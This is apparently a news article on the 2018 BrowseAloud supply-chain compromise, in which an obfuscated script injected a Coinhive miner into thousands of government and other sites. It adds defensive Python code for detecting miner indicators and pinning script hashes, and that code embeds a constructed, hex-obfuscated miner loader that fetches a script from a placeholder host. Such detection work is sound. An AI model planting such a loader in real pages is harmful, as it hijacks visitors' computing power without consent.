Thousands of sites were injected with an in-browser Monero miner today after a popular accessibility script was compromised. With 4,275 sites affected, this included government websites such as uscourts.gov, ico.org.uk, & manchester.gov.uk.
This was first noticed earlier this morning by infosec consultant Scott Helme when he saw that UK government site ico.org.uk was utilizing the Coinhive in-browser mining (cryptojacking) script. This caused the browser of any visitor to the site to use their CPU to mine for the digital currency called Monero.
When Helme investigated further he saw that it wasn’t just this site that started injecting a Coinhive miner, but many other government sites from numerous countries such as uscourts.gov, gmc-uk.gov, nhsinform.scot, manchester.gov.uk, and many more.
— Scott Helme (@Scott_Helme) February 11, 2018
The one thing all of these sites had in common was that they utilized a popular text-to-speech accessibility script called BrowseAloud by TextHelp.com. When Helme examined the BrowseAloud script, he saw that this script contained obfuscated code that was injecting the Coinhive miner into all of these websites.
When decoded, this script injects the Coinhive cryptojacking script, runs it at 40% CPU utilization, and mines for the 1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq Coinhive account.
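The injection described above is a classic third-party script supply-chain compromise: the page trusted a script served from a vendor's host, and an attacker changed what that host delivered. The following Python code is an added example written for this article, not code from the article, from Helme, or from TextHelp. It shows two defender-side checks a site operator could run: decoding hex-escaped strings in a fetched script and scanning the result for miner indicators (including the Coinhive `throttle` option, which Coinhive documented as the fraction of time the miner idles, so `throttle: 0.6` corresponds to the 40% CPU figure above), and pinning a known-good copy of the script with a Subresource-Integrity-style `sha384-` hash so any change in the served file is detected. The script body, host names and site key below are constructed placeholders, not the real payload.

```python
import base64
import hashlib
import re

# Constructed sample of a third-party script: a benign loader followed by an
# injected block that hides "coinhive"/"CoinHive" behind \xNN escapes. This is
# an illustration, not the actual BrowseAloud payload.
SAMPLE_SCRIPT = r'''
/* legitimate accessibility loader (constructed) */
var ba = document.createElement("script");
ba.src = "https://texthelp.example/ba/plus/scripts/ba.js";
document.head.appendChild(ba);
/* injected block (constructed, hex-escaped to look obfuscated) */
var s = document.createElement("script");
s.src = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" + "cnhv.example/lib/\x63\x6f\x69\x6e\x68\x69\x76\x65.min.js";
s.onload = function () {
  var m = new window["\x43\x6f\x69\x6e\x48\x69\x76\x65"].Anonymous("SITEKEY_PLACEHOLDER", {throttle: 0.6});
  m.start();
};
document.head.appendChild(s);
'''

# The known-good copy an operator would have pinned before the incident (constructed).
TRUSTED_SCRIPT = '''
var ba = document.createElement("script");
ba.src = "https://texthelp.example/ba/plus/scripts/ba.js";
document.head.appendChild(ba);
'''

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Substrings that a miner loader typically cannot avoid once string escapes are undone.
MINER_INDICATORS = ("coinhive.min.js", "coinhive", "anonymous(", ".start(", "throttle")


def decode_hex_escapes(js: str) -> str:
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def find_miner_indicators(js: str) -> list:
    """Return the miner indicators present in the script after de-escaping."""
    decoded = decode_hex_escapes(js).lower()
    return [ind for ind in MINER_INDICATORS if ind in decoded]


def miner_cpu_percent(js: str):
    """Derive the CPU share a Coinhive-style loader asks for from its throttle option.

    Assumes Coinhive semantics: throttle is the idle fraction, so CPU share is
    (1 - throttle). Returns None if no throttle option is found.
    """
    m = re.search(r"throttle\s*:\s*([0-9]*\.?[0-9]+)", decode_hex_escapes(js))
    if not m:
        return None
    throttle = float(m.group(1))
    return int(round((1.0 - throttle) * 100))


def sri_hash(body: str) -> str:
    """Compute a Subresource-Integrity-style sha384 digest for a script body."""
    digest = hashlib.sha384(body.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def script_tampered(body: str, pinned_hash: str) -> bool:
    """True when the served script no longer matches the hash pinned for it."""
    return sri_hash(body) != pinned_hash


def external_script_hosts(html: str) -> list:
    """List the hosts of all externally loaded <script src> tags in a page,
    so an operator can inventory which pages include a given vendor script."""
    srcs = re.findall(r"<script[^>]+src=[\"']https?://([^/\"']+)", html, flags=re.I)
    return sorted(set(h.lower() for h in srcs))


if __name__ == "__main__":
    pinned = sri_hash(TRUSTED_SCRIPT)
    print("indicators:", find_miner_indicators(SAMPLE_SCRIPT))
    print("requested CPU share:", miner_cpu_percent(SAMPLE_SCRIPT), "%")
    print("served script tampered:", script_tampered(SAMPLE_SCRIPT, pinned))
    page = '<html><script src="https://texthelp.example/ba/plus/scripts/ba.js"></script></html>'
    print("external script hosts:", external_script_hosts(page))
```

The hash pin is the check that would have fired here regardless of how the injected code was obfuscated: any byte changed in the served file changes the digest. The indicator scan is a complement for scripts that are expected to change legitimately and therefore cannot be pinned.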
Knowing that it was a compromised BrowseAloud script that was injecting the miner, Helme was able to quickly track the script to 4,275 sites that were affected in the incident.
After Helme alerted TextHelp.com about their compromised script, the CTO of TextHelp stated that the script was taken down and would not be enabled again until after an investigation took place.
BleepingComputer reached out to TextHelp for more information but had not heard back from them at the time of publishing this article. According to a recently published post by TextHelp, the company has stated that an attacker compromised the BrowseAloud script, but no other TextHelp services were affected.